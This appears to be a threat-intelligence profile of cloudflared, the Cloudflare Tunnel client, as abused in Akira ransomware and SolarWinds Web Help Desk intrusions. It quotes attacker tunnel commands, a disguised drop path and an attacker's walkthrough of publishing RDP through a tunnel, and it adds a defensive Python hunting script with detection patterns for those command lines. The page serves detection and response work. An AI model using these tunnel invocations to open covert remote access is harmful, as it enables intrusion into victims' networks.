Cloudflared
Cloudflared is the Cloudflare Tunnel client, a legitimate utility that is repeatedly observed in intrusion activity as a tunneling and remote-access tool rather than bespoke malware. In the reporting collected here, threat actors used cloudflared.exe to establish persistent tunnels back to attacker-controlled infrastructure and to create secondary backdoor communication paths for redundant access. It was observed in Akira ransomware intrusions, including one in which an affiliate installed Cloudflare Tunnel via MSI and ran cloudflared.exe tunnel run --token ..., and in a broader SonicWall SSL VPN campaign where protocol tunneling via Cloudflare Tunnel was documented among Akira tradecraft. It was also deployed during exploitation of SolarWinds Web Help Desk, where the attacker installed Cloudflared from GitHub’s official release channel after gaining code execution and used it as a secondary tunnel-based access path alongside other remote tooling. High-confidence behaviors in the reporting are persistent tunnel establishment, backdoor communications, and support for hands-on-keyboard post-compromise operations. Associated activity in the same incidents included reconnaissance, credential theft, lateral movement, data staging and exfiltration, and ransomware deployment by Akira affiliates. The reporting specifically identifies the executable name cloudflared.exe and the command-line tunnel invocation as notable indicators; because the same evidence also includes a renamed copy (C:\ProgramData\windows_update.exe), hunting cannot rely on the file name alone and should also key on the command line, the drop path, and the binary's original file name and hash.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“...CVE-2025-26399 was just recently discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation.”
"...followed immediately by the installation of Cloudflared from GitHub’s official release channel. This created a secondary tunnel-based access path..."
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (1 technique)
Execution (1 technique)
Persistence (1 technique)
Privilege Escalation (1 technique)
Discovery (2 techniques)
As the attacker, I need to have some knowledge about the victim’s network environment to configure the tunnel to allow access to the Private Network. In this case, a simple ipconfig from the victim machine gets me some basic details demonstrating the IP address and subnet of the machine.
Lateral Movement (4 techniques)
... TightVNC ... PsExec ... OpenSSH ... PowerShell Remoting (PSRemoting) ... RDP Patcher ... VS Code Tunnel ... Cloudflared ...
I can pre-configure a tunnel on the Cloudflare Dashboard with a Public Hostname for access.not-malicio.us hosting an RDP service at localhost:3389... Here we can see the successful connection established using Cloudflared’s access command, and the resulting RDP session pointing to localhost:3389.
Command and Control (7 techniques)
Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host... Cloudflared tunnels traffic through the Cloudflare network.
Private Networks allows an administrator to provide access to an entire CIDR range through the tunnel, allowing a client device, such as an attacker’s machine, network access as though they were physically collocated with the victim machine hosting the tunnel... From here, an attacker can interact with any device in the private network.
Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared... A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave them layered persistence
That script downloaded and installed an MSI package in the background with no visible indication to the user. Separately, the attacker deployed EtherRAT... Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared.
Incident #2: The threat actor almost immediately installed Cloudflare’s freely available tunnelling software here, C:\ProgramData\windows_update.exe, followed by the download and execution of another dual-use agent, Radmin [T1572 – Protocol Tunneling] [T1219 – Remote Access Software]
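The indicators above (cloudflared.exe invoked with tunnel run --token, a renamed copy dropped as C:\ProgramData\windows_update.exe, and the access client pivoting to a published RDP hostname) translate directly into a process-creation hunt. The following is an added example written for this page; it is not code from Mallory, from Cloudflare, or from any of the reports quoted. The events are constructed to resemble Sysmon Event ID 1 fields and are not real telemetry. Two assumptions are labeled in the code: that a renamed copy still carries OriginalFileName=cloudflared.exe in its PE version resource, and that a tunnel token is base64 of JSON with keys a (account tag), t (tunnel ID) and s (secret), which is the layout cloudflared's own TunnelToken uses; verify both against the build you are handling.

```python
"""
Hunt for cloudflared abuse in process-creation telemetry and pull pivotable
indicators (operator account tag, tunnel ID) out of a tunnel token.

Added example; not code from the page, from Cloudflare or from any quoted report.
All events and the token below are constructed.
"""
import base64
import json
import re

# Constructed tunnel token, built the way cloudflared encodes one (assumed layout:
# base64 of JSON with "a" = account tag, "t" = tunnel ID, "s" = tunnel secret).
SAMPLE_TOKEN = base64.b64encode(json.dumps({
    "a": "0123456789abcdef0123456789abcdef",
    "t": "11111111-2222-3333-4444-555555555555",
    "s": "c2VjcmV0",
}).encode()).decode()

# Constructed Sysmon Event ID 1 style records; not real telemetry.
SAMPLE_EVENTS = [
    {   # installed via MSI and run with a token, as in the Akira intrusion on the page
        "Image": r"C:\Program Files (x86)\cloudflared\cloudflared.exe",
        "OriginalFileName": "cloudflared.exe",
        "CommandLine": f'"C:\\Program Files (x86)\\cloudflared\\cloudflared.exe" tunnel run --token {SAMPLE_TOKEN}',
    },
    {   # renamed copy dropped in ProgramData, as in Incident #2 on the page
        "Image": r"C:\ProgramData\windows_update.exe",
        "OriginalFileName": "cloudflared.exe",
        "CommandLine": f"C:\\ProgramData\\windows_update.exe tunnel --no-autoupdate run --token {SAMPLE_TOKEN}",
    },
    {   # 'access' client pivoting to a published RDP hostname (see the access.not-malicio.us quote)
        "Image": r"C:\Users\jdoe\Downloads\cloudflared.exe",
        "OriginalFileName": "cloudflared.exe",
        "CommandLine": r"cloudflared.exe access rdp --hostname access.not-malicio.us --url rdp://localhost:13389",
    },
    {   # benign noise
        "Image": r"C:\Windows\System32\svchost.exe",
        "OriginalFileName": "svchost.exe",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    },
]

TUNNEL_RUN = re.compile(r"\btunnel\b.*\brun\b", re.I)          # 'tunnel [opts] run'
TOKEN_FLAG = re.compile(r"--token[ =](\S+)", re.I)              # '--token X' or '--token=X'
ACCESS_CLIENT = re.compile(r"\baccess\s+(rdp|ssh|tcp|smb)\b", re.I)


def classify_process(event):
    """Return {"severity", "reasons", "token"} for one process-creation event."""
    image = event.get("Image", "")
    image_name = image.rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    reasons, token = [], None

    # Assumption: a renamed copy keeps OriginalFileName=cloudflared.exe in its PE version
    # resource. If the build you have lacks it, fall back on the file hash and the
    # command-line checks below, which do not depend on the file name at all.
    if original == "cloudflared.exe" and image_name != "cloudflared.exe":
        reasons.append(f"renamed cloudflared binary: {image}")
    elif image_name == "cloudflared.exe":
        reasons.append("cloudflared.exe by image name")

    if TUNNEL_RUN.search(cmdline):
        reasons.append("'tunnel run': outbound tunnel to Cloudflare's edge")
    match = TOKEN_FLAG.search(cmdline)
    if match:
        token = match.group(1)
        reasons.append("--token: remotely managed tunnel; routing lives in the operator's Cloudflare account")
    if ACCESS_CLIENT.search(cmdline):
        reasons.append("'access' client: pivot into a service published through a tunnel")

    if not reasons:
        severity = "none"
    elif token or reasons[0].startswith("renamed"):
        severity = "high"
    else:
        severity = "medium"
    return {"severity": severity, "reasons": reasons, "token": token}


def decode_tunnel_token(token):
    """Extract the account tag and tunnel ID from a tunnel token; the secret is not returned.
    Both identify the operator's Cloudflare-side infrastructure and are worth pivoting on."""
    try:
        padded = token + "=" * (-len(token) % 4)
        data = json.loads(base64.b64decode(padded, validate=True))
    except ValueError:  # covers binascii.Error, UnicodeDecodeError and JSONDecodeError
        return None
    if not isinstance(data, dict) or "a" not in data or "t" not in data:
        return None
    return {"account_tag": data["a"], "tunnel_id": data["t"]}


def hunt(events):
    """Classify every event and attach decoded token pivots to the hits."""
    hits = []
    for index, event in enumerate(events):
        verdict = classify_process(event)
        if verdict["severity"] == "none":
            continue
        verdict["index"] = index
        verdict["pivot"] = decode_tunnel_token(verdict["token"]) if verdict["token"] else None
        hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["index"], hit["severity"], "; ".join(hit["reasons"]), hit["pivot"])
```

The account tag and tunnel ID recovered from a token are the pivot a responder wants: they tie every host running that token to one operator-controlled Cloudflare account and tunnel, and they are what you hand to Cloudflare when reporting abuse. The token's secret is deliberately not returned, since the hunt only needs the identifiers.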
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Cloudflared was used to establish a reverse tunnel/persistent access channel during an Akira intrusion, providing command-and-control style connectivity.
Cloudflare Tunnel client used legitimately for secure tunneling, but frequently abused to establish persistent remote access tunnels.
Legitimate Cloudflare tunneling client abused to establish a redundant remote access tunnel for persistence/backup C2.
Cloudflare Tunnel client used to establish protocol tunneling/C2-like connectivity (backdoor communications) in the intrusion.